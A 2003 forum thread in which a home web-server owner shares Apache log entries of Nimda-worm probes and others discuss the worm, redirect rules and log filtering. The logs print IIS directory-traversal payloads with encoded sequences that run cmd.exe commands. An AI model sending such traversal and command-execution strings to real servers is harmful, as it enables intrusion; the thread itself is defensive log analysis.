Attempted Hack??

Hi

Having just set up a web server on my home computer I was suprised to find this (and several identical) hack attack in my logs. I'm pretty confident I have everything nailed down (but not complacent). Wondered if anyone had any comment about this visitor??

As they originate from blueyonder IP addresses I'm planning to report them.

Steve


80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 214 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 212 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 222 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:33 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 253 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:34 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 235 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:35 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 226 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"
80.192.153.210 - - [02/Mar/2003:20:35:36 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 236 "-" "-"

Yes, it´s a hack-attempt.
But nothing to be done about it. They happen at least 3-10 times per day at our company´s web-server (non-public!). Some people are just too lazy to upgrade - you can tell them as often as you want...
this makes the worms on the ´net stay alive

no need to worry if you secured your server.

in .htaccess change to prevent server virus from writing false error messages

redirect /scripts http://www.stoptheviruscold.invalid
redirect /MSADC http://www.stoptheviruscold.invalid

Thanks for info

Further investigation shows it to be a NIMBA virus trying to get to my machine.

I quite like the redirect idea, but not sure what advantage it offers over my own 404 message (my sever is set up with non-standard dir names and very limited access so standard attacks like this shouldn't get anywhere). Any real attack would spot the redirected http address and realise what the target site was doing.

Interestingly did you know you can't rename cmd.exe in win2000. If you do win2000 re-creates it at boot!! Just shows that win 2000 still needs DOS.

Steve

No. This shows that Win2k is trying not to allow you to render the system unusuable. This (the "magic" re-appearing - also if you delete the file) happens with all files in the system and system32 folders (and some more too). it´s called PC-Health and was first introduced on WinME. Win2K and XP have it too, but i think it has another name now.

This *NIMDA* worm is incredibly popular, alot and i mean alot of people were infected with it a while ago and are still being infected with it,
If your servers secured against this type of intrusion you have nothing to worry about,
the re-direction thing is a good idea for the users sake, most the people who are infected with this (if not all) dont have a clue that they are so by re-directing them to a page explaining what they have on the box and steps to removel could be really appreciated by alot of them

Most the people who are making these types of requests are actually still vulnerable to the attack themselves (are running unpatched boxes) - so anyone can access there machines
Thats why that re-direction thing could be good / helpful
(something i did on my server back ago)

All the best

Nimda/CodeRed doesn't care what Redirect Apache sends, thus, instructing it to redirect to anywhere does not do what you think it would do.
If you just don't want attempts like that to show up in your log, just use SetEnvIf to filter them out. Don't ask me how (I have replied over hundred times on this issue already), just search SetEnvIf under my username.